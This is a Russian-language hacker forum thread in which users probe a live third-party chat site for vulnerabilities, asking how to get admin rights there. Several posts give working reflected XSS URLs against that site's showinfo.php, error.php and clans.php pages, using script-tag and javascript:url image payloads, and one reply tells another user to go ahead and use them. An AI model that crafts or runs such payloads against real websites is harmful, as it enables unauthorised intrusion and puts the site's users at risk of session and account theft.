Вот гулял по просторам инета и набрел вот на этот сайт http://sin-lab.net.ru
Они типа чат делают какой-то.

Так вот суть вопроса, у них типа пример чата расположен по адресу http://chat.ordenvlasti.ru/
Есть ли в нем дыры и можно ли получить права админа в нем?

Щас проверим..
PS для тех кто будет ковыряться:
Ник: tester
Пасс: 123456

Вот вам XSS
http://chat.ordenvlasti.ru/showinfo.php?nick=%3Cscript%3Ealert(123456)%3C/script%3E

EST a1ien, Нет здесь xss, алерт не выпадает.. С чего ты взял что она там?

Вот вам XSS

хм, а что с эим делать то?
при вставке в адресную строку открывается пустая страница :(

Через сообщения (Пм) ничего не получается, т.к. у каждого сообщения свой id..
В поисковике всё тоже пофиксено..
EST a1ien, нету там xss ещё раз говорю.. Я пробовал, там всё фильтруется.. Хватит писать не по теме, хочешь что то маленькое добавить, отредактируй тот пост...

http://chat.ordenvlasti.ru/showinfo.php?nick=<script>alert(123456)</script>

----------------

Чтобы вылетел алерт надо зайти в чат.

Расшарил xss в поисковике: Для выпада алерта, нужен вход в чат
_http://chat.ordenvlasti.ru/showinfo.php?nick=%3Cimage+style%3Dbackground%3Aur l%28javascript%3Aalert%28%2FSLIP%2F%29%29%3E
============
Ещё одна: Вход в чат необязателен
_http://chat.ordenvlasti.ru/error.php?msg=Пароль%20не%20верный!"><image%20style=background:url(javascript:alert(/SLIP/))>
============
На главной странице, при просмотре анкеты админа.. Хоть и пишит что ник не зареген. но алерт то вылазит) Вход в сам чат необязателен
_http://chat.ordenvlasti.ru/showinfo.php?nick=DarkAG"><image%20style=background:url(javascript:alert(/SLIP/))>
Или так:
_http://chat.ordenvlasti.ru/showinfo.php?nick=DarkAG"><script>alert(/SLIP/)</script>

Короче в этом посте я буду писать все найденные баги
1)
http://chat.ordenvlasti.ru/clans.php?clan=%3Cscript%3Ealert(123456)%3C/script%3E
Вход в чат необязателен.

Chaos-zone, тебе выложили уязвимости.. пользуйся)

http://www.forum.antichat.ru/threadnav16184-1-10.html кажется здесь говорят о этой теме, но не уверен.
p.s. тему читайте до конца.

Нет это кажись не он.

Всё же не про него.. А этот новый чат то дырявый оказался)

Мля. Скачал этот чат. Пробовал тестить Xss. А нах они нужны в этом чате? С помощью их нифига не сделаешь =) Есть ещё какие либо варианты?